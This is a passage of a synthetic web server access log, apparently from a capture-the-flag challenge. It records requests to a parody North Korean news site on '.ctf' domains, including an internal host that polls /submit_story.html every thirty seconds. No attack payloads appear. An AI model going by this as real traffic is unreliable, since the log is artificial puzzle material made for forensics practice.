HTTP/1.1" 200 7532 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0" +59.5.96.11 - - [23/Jul/2020:11:26:10 -0500] "GET / HTTP/1.1" 200 12994 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +154.171.176.154 - - [23/Jul/2020:11:26:14 -0500] "GET /en/first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.0" 200 7551 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +120.76.55.92 - - [23/Jul/2020:11:26:17 -0500] "GET / HTTP/1.1" 200 9090 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +19.231.178.151 - - [23/Jul/2020:11:26:19 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 13831 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" +192.168.51.66 - - [23/Jul/2020:11:26:22 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +170.209.15.115 - - [23/Jul/2020:11:26:23 -0500] "POST /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +123.104.121.91 - - [23/Jul/2020:11:26:24 -0500] "POST /new-medicine-developed-in-dprk/ HTTP/1.1" 500 14592 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +198.246.155.232 - - [23/Jul/2020:11:26:25 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 9781 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +50.126.190.78 - - [23/Jul/2020:11:26:28 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 12986 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0" +140.111.249.163 - - [23/Jul/2020:11:26:30 -0500] "GET /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 10748 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +146.54.185.141 - - [23/Jul/2020:11:26:32 -0500] "POST /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 404 9392 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +236.31.151.247 - - [23/Jul/2020:11:26:35 -0500] "POST /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 403 4499 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +21.183.104.45 - - [23/Jul/2020:11:26:38 -0500] "GET /kumdang-2-injection-manufactured/ HTTP/1.1" 200 7597 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +165.163.77.12 - - [23/Jul/2020:11:26:42 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 12971 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +97.143.229.221 - - [23/Jul/2020:11:26:45 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 2069 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +175.107.2.21 - - [23/Jul/2020:11:26:49 -0500] "GET /en/song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 7175 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +192.168.51.66 - - [23/Jul/2020:11:26:52 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +63.194.227.95 - - [23/Jul/2020:11:26:52 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 3183 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +182.189.189.147 - - [23/Jul/2020:11:26:55 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 304 12813 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +159.81.165.209 - - [23/Jul/2020:11:26:56 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 10311 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.79 Mobile/14D27 Safari/602.1" +56.221.110.21 - - [23/Jul/2020:11:27:00 -0500] "POST /99-problems/ HTTP/1.1" 200 4087 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +37.166.140.239 - - [23/Jul/2020:11:27:02 -0500] "GET / HTTP/1.1" 200 8164 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50" +164.110.106.49 - - [23/Jul/2020:11:27:06 -0500] "POST /en/new-national-record-set-in-archery/ HTTP/1.1" 200 3969 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +95.97.228.183 - - [23/Jul/2020:11:27:07 -0500] "GET /en/kumdang-2-injection-manufactured/ HTTP/1.0" 500 11568 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +90.196.79.250 - - [23/Jul/2020:11:27:10 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 7416 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +101.145.207.158 - - [23/Jul/2020:11:27:12 -0500] "GET /en/kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 11823 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +224.124.90.32 - - [23/Jul/2020:11:27:14 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 14480 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +47.51.143.124 - - [23/Jul/2020:11:27:15 -0500] "POST /en/ HTTP/1.1" 200 14142 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +67.41.132.181 - - [23/Jul/2020:11:27:16 -0500] "GET /kim-jong-fun/ HTTP/1.1" 200 13471 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +132.31.71.120 - - [23/Jul/2020:11:27:18 -0500] "GET /en/tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 200 8689 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +230.183.7.151 - - [23/Jul/2020:11:27:22 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 10967 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0" +43.89.60.108 - - [23/Jul/2020:11:27:26 -0500] "POST /many-medical-scientific-achievements-made/ HTTP/1.1" 200 7133 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" +94.9.98.48 - - [23/Jul/2020:11:27:28 -0500] "POST /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 8398 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +77.38.124.79 - - [23/Jul/2020:11:27:29 -0500] "GET / HTTP/1.1" 200 2205 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +56.101.134.248 - - [23/Jul/2020:11:27:32 -0500] "GET /en/north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 9742 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +129.27.196.203 - - [23/Jul/2020:11:27:36 -0500] "GET /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 5296 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +96.25.234.240 - - [23/Jul/2020:11:27:38 -0500] "GET /en/phyongchon-pickle-factory/ HTTP/1.1" 200 2692 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +56.168.161.4 - - [23/Jul/2020:11:27:41 -0500] "GET /sudoku/ HTTP/1.1" 200 5406 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +123.84.94.115 - - [23/Jul/2020:11:27:45 -0500] "POST /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 200 14691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36" +51.66.244.147 - - [23/Jul/2020:11:27:48 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 12943 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +192.168.51.66 - - [23/Jul/2020:11:27:52 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +19.184.183.129 - - [23/Jul/2020:11:27:52 -0500] "GET / HTTP/1.1" 200 5796 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)" +248.180.132.21 - - [23/Jul/2020:11:27:55 -0500] "POST /dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 301 4998 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +114.89.216.156 - - [23/Jul/2020:11:27:56 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 10800 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +180.94.106.247 - - [23/Jul/2020:11:28:00 -0500] "POST /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.0" 200 8637 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +129.239.5.98 - - [23/Jul/2020:11:28:02 -0500] "POST /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.0" 400 11052 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0" +174.177.139.21 - - [23/Jul/2020:11:28:05 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 12801 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +86.171.51.15 - - [23/Jul/2020:11:28:07 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.0" 403 14153 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +27.96.187.206 - - [23/Jul/2020:11:28:08 -0500] "GET /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 13565 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +138.223.71.129 - - [23/Jul/2020:11:28:09 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 13334 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +136.168.105.171 - - [23/Jul/2020:11:28:10 -0500] "GET /en/phyongchon-pickle-factory/ HTTP/1.1" 200 12935 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +74.70.197.122 - - [23/Jul/2020:11:28:14 -0500] "GET /new-books-published-in-dprk/ HTTP/1.1" 200 14865 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +203.99.145.117 - - [23/Jul/2020:11:28:18 -0500] "POST /pyingpong-orphans-secondary-school-completed/ HTTP/1.1" 301 9749 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4" +181.171.188.128 - - [23/Jul/2020:11:28:22 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 14683 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:28:22 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +25.174.47.42 - - [23/Jul/2020:11:28:25 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 7552 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50" +82.179.3.13 - - [23/Jul/2020:11:28:29 -0500] "GET /en/stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.0" 200 4470 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +199.137.71.153 - - [23/Jul/2020:11:28:30 -0500] "GET /kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.1" 200 5940 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +31.70.153.222 - - [23/Jul/2020:11:28:31 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 8315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +220.35.126.126 - - [23/Jul/2020:11:28:32 -0500] "GET /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 4949 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +14.145.136.164 - - [23/Jul/2020:11:28:35 -0500] "GET /en/ryomyong-street-under-construction-in-pyongyang/ HTTP/1.0" 200 9942 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +252.180.67.198 - - [23/Jul/2020:11:28:38 -0500] "POST /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 10114 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +3.247.159.184 - - [23/Jul/2020:11:28:40 -0500] "GET /dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 301 10131 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +142.213.237.158 - - [23/Jul/2020:11:28:44 -0500] "GET /sudoku/ HTTP/1.1" 200 6436 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +106.157.130.223 - - [23/Jul/2020:11:28:48 -0500] "POST /en/ HTTP/1.1" 200 7297 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" +31.172.251.192 - - [23/Jul/2020:11:28:51 -0500] "POST /en/ HTTP/1.1" 200 4364 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +249.184.92.181 - - [23/Jul/2020:11:28:52 -0500] "GET /sudoku/ HTTP/1.1" 200 11581 "http://www.yahoo.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +192.168.51.66 - - [23/Jul/2020:11:28:52 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +125.97.14.115 - - [23/Jul/2020:11:28:55 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 2451 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +90.114.199.122 - - [23/Jul/2020:11:28:59 -0500] "GET / HTTP/1.1" 200 13411 "-" "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" +72.164.137.163 - - [23/Jul/2020:11:29:03 -0500] "POST /en/sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 200 4574 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +88.45.148.192 - - [23/Jul/2020:11:29:07 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +109.114.94.32 - - [23/Jul/2020:11:29:08 -0500] "POST /en/kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 12619 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +231.7.95.14 - - [23/Jul/2020:11:29:10 -0500] "GET /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.0" 200 8534 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +128.83.12.248 - - [23/Jul/2020:11:29:11 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 4196 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" +10.13.0.151 - - [23/Jul/2020:11:29:13 -0400] "GET / HTTP/1.0" 400 0 "-" "-" +100.70.224.124 - - [23/Jul/2020:11:29:13 -0500] "GET /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 5413 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +145.240.183.92 - - [23/Jul/2020:11:29:14 -0500] "POST /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 14982 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +76.79.3.171 - - [23/Jul/2020:11:29:16 -0500] "GET /north-kiringul-air-force/ HTTP/1.1" 200 12242 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +125.124.67.160 - - [23/Jul/2020:11:29:20 -0500] "GET /en/deep-pan-or-classic/ HTTP/1.1" 200 8661 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +246.147.144.130 - - [23/Jul/2020:11:29:22 -0500] "GET /en/ HTTP/1.1" 200 4197 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:29:22 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +237.135.105.181 - - [23/Jul/2020:11:29:25 -0500] "GET /en/dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 12886 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" +250.179.108.193 - - [23/Jul/2020:11:29:28 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 2539 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +208.112.78.223 - - [23/Jul/2020:11:29:29 -0500] "GET /en/ HTTP/1.1" 200 8157 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +217.16.24.218 - - [23/Jul/2020:11:29:30 -0500] "POST /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 200 4923 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +226.147.176.83 - - [23/Jul/2020:11:29:31 -0500] "GET /kim-jong-un-guides-strategic-submarine-underwater-ballistic-missile-test-fire/ HTTP/1.1" 304 14323 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +187.117.154.16 - - [23/Jul/2020:11:29:33 -0500] "GET /north-kiringul-air-force/ HTTP/1.1" 200 4560 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +209.189.239.136 - - [23/Jul/2020:11:29:37 -0500] "POST /en/kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 7767 "http://www.yahoo.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +122.48.30.21 - - [23/Jul/2020:11:29:39 -0500] "POST /new-national-record-set-in-archery/ HTTP/1.0" 200 6396 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" +16.253.171.20 - - [23/Jul/2020:11:29:43 -0500] "GET /pyingpong-puppet-company/ HTTP/1.1" 200 8092 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +132.72.139.25 - - [23/Jul/2020:11:29:47 -0500] "POST / HTTP/1.1" 200 13259 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +29.55.55.224 - - [23/Jul/2020:11:29:48 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 9316 "-" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +89.81.153.80 - - [23/Jul/2020:11:29:51 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 400 10563 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:29:52 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +197.166.235.19 - - [23/Jul/2020:11:29:54 -0500] "GET /en/kim-jong-fun/ HTTP/1.1" 200 14046 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +87.13.117.83 - - [23/Jul/2020:11:29:58 -0500] "POST /en/kim-jong-un-gives-field-guidance-to-pyongyang-hosiery-factory/ HTTP/1.0" 200 4847 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +236.76.172.34 - - [23/Jul/2020:11:30:00 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 6453 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +167.253.32.200 - - [23/Jul/2020:11:30:02 -0500] "GET / HTTP/1.1" 200 9234 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +223.60.11.41 - - [23/Jul/2020:11:30:04 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 14312 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +206.80.108.160 - - [23/Jul/2020:11:30:08 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 10738 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100 Safari/537.36" +74.78.84.214 - - [23/Jul/2020:11:30:10 -0500] "POST /en/kumdang-2-injection-manufactured/ HTTP/1.1" 200 11660 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +238.218.55.54 - - [23/Jul/2020:11:30:13 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.1" 200 3364 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +115.180.159.178 - - [23/Jul/2020:11:30:17 -0500] "POST /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 6699 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0" +56.94.129.168 - - [23/Jul/2020:11:30:19 -0500] "GET 